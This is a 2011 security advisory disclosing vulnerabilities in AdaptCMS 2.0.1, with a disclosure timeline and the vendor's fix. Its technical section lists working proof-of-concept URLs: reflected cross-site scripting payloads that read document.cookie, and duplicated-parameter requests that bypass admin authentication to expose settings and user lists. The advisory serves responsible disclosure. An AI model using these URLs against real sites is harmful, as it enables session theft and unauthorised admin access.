Description
Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2011-018
Author: Stefan Schurtz
Affected Software: Successfully tested on AdaptCMS 2.0.1
Vendor URL: http://www.adaptcms.com/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

AdaptCMS 2.0.1 is prone to multiple security vulnerabilities.

==================
Technical Details:
==================

Cross-site Scripting

http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>

Authentication bypass / Information Disclosure

http://<target>/AdaptCMS/admin.php?view=/&view=settings
http://<target>/AdaptCMS/admin.php?view=/&view=users
http://<target>/AdaptCMS/admin.php?view=/&view=groups
http://<target>/AdaptCMS/admin.php?view=/&view=levels
http://<target>/AdaptCMS/admin.php?view=/&view=stats

=========
Solution:
=========

"Get the latest AdaptCMS Files" from the admin area

====================
Disclosure Timeline:
====================

24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt